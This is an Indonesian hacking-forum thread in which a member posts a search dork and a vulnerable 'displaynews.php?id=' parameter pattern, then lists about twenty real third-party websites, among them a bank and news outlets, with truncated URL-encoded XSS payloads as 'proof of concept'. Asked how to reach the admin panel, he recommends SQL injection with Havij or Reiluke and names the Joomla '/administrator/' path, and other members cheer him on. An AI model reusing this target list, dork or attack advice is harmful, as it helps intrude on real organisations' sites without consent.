Multiple Vulnerability (XSS+SQLi)
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
- Darkzzzz
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
- Contact:
Multiple Vulnerability (XSS+SQLi)
:maaf: Kalo repost atau udah pernah :maaf:
Ane baru nemu beberapa jam yang lalu :tapa:
intitle:"Highdesert news"
vuln : http://website.xxx/displaynews.php?id=<sql + xss/html>
POC :
http://silverlakesmcf.com/displaynews.p ... c%3C/h1%3E
http://theapplevalleynews.com/displayne ... c%3C/h1%3E
http://thesilverlakesnews.com/displayne ... c%3C/h1%3E
http://thespringvalleynews.com/displayn ... c%3C/h1%3E
http://thespringvalleylakenews.com/disp ... c%3C/h1%3E
http://thevictorvillenews.com/displayne ... c%3C/h1%3E
Ane baru nemu beberapa jam yang lalu :tapa:
intitle:"Highdesert news"
vuln : http://website.xxx/displaynews.php?id=<sql + xss/html>
POC :
http://silverlakesmcf.com/displaynews.p ... c%3C/h1%3E
http://theapplevalleynews.com/displayne ... c%3C/h1%3E
http://thesilverlakesnews.com/displayne ... c%3C/h1%3E
http://thespringvalleynews.com/displayn ... c%3C/h1%3E
http://thespringvalleylakenews.com/disp ... c%3C/h1%3E
http://thevictorvillenews.com/displayne ... c%3C/h1%3E
I'm not A Hacker, But I'm A
Re: XSS + MySql Error
:kaca:
keren wkwkwkwk awas kena bugss.......
keren wkwkwkwk awas kena bugss.......
- Darkzzzz
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
- Contact:
Re: XSS + MySql Error
Nambah ah, mumpung ane belon ngantuxXx
http://www.connexions-bury.com/latest_n ... e%3C/h1%3E
http://www.connexions-stockport.com/lat ... e%3C/h1%3E
http://www.connexions-stockport.org.uk/ ... e%3C/h1%3E
http://www.darwincyclingclub.com/news/d ... e%3C/h1%3E
http://www.experis.com/displaynews.php? ... e%3C/h1%3E
http://www.iccj.or.jp/displaynews.php?i ... e%3C/h1%3E
http://www.innodelta.net/nrwnl/_system/ ... e%3C/h1%3E
http://www.nccbank.com.np/displaynews.p ... e%3C/h1%3E
http://www.show-canada.com/app/template ... e%3C/h1%3E
http://newsftp3.an.tv/s/?sid=5%3E%3Cscr ... e%3C/h1%3E
http://www.mcflyofficial.com/news/index ... e%3C/h1%3E
http://www.comingsoon.net/news/movienew ... e%3C/h1%3E
http://www.asianewsnet.net/news.php?sec ... e%3C/h1%3E
http://www.selenetrawlers.com/news-id.p ... e%3C/h1%3E
Thanks to : Bang Poni atas tutorial Havijnya & Thanks to Wilmar Kidz atas Indosiarnya... :love:
http://www.connexions-bury.com/latest_n ... e%3C/h1%3E
http://www.connexions-stockport.com/lat ... e%3C/h1%3E
http://www.connexions-stockport.org.uk/ ... e%3C/h1%3E
http://www.darwincyclingclub.com/news/d ... e%3C/h1%3E
http://www.experis.com/displaynews.php? ... e%3C/h1%3E
http://www.iccj.or.jp/displaynews.php?i ... e%3C/h1%3E
http://www.innodelta.net/nrwnl/_system/ ... e%3C/h1%3E
http://www.nccbank.com.np/displaynews.p ... e%3C/h1%3E
http://www.show-canada.com/app/template ... e%3C/h1%3E
http://newsftp3.an.tv/s/?sid=5%3E%3Cscr ... e%3C/h1%3E
http://www.mcflyofficial.com/news/index ... e%3C/h1%3E
http://www.comingsoon.net/news/movienew ... e%3C/h1%3E
http://www.asianewsnet.net/news.php?sec ... e%3C/h1%3E
http://www.selenetrawlers.com/news-id.p ... e%3C/h1%3E
Thanks to : Bang Poni atas tutorial Havijnya & Thanks to Wilmar Kidz atas Indosiarnya... :love:
I'm not A Hacker, But I'm A
Re: Multiple Vulnerability (XSS+SQLi)
terus lo mau masuk ke adminnya gmana kakak.......!
- Darkzzzz
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
- Contact:
Re: Multiple Vulnerability (XSS+SQLi)
Cari aja pake Havij atau nggak pake Reiluke, tutornya khan dah dijelaskan sama bang Poni...
Tapi kalo targetnya joomla sih nggak masalah, tinggal /administrator/
Tapi kalo targetnya joomla sih nggak masalah, tinggal /administrator/
I'm not A Hacker, But I'm A
Re: Multiple Vulnerability (XSS+SQLi)
lo gitu ijin lakuin SQLI kakak....................!
:devil :devil :devil :devil :licik: :licik: :licik: :licik: :licik: :licik:
:devil :devil :devil :devil :licik: :licik: :licik: :licik: :licik: :licik:
- andryh4ever
- Posts: 181
- Joined: Tue Dec 15, 2009 3:08 pm
- Location: Kendawangan, Kab. Ketapang, Kalimantan Barat
- Contact:
Re: Multiple Vulnerability (XSS+SQLi)
Wew DJ XSS beraksi lagi.. :kaca:
Let's Join with us on http://www.borneocrew.org/
..::: Hanya Ing!n Menul!$ Apa Yang Ing!n Aku Tul!s :::..
[*] Visit me on http://pl4nkt0n767.blogspot.com [*]
[*] Visit me on http://spyc0dz.blogspot.com [*]
- Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: Multiple Vulnerability (XSS+SQLi)
ijin nimbrung juga.. :devil :love:
-==Hanya Ingin belajar dan belajar==-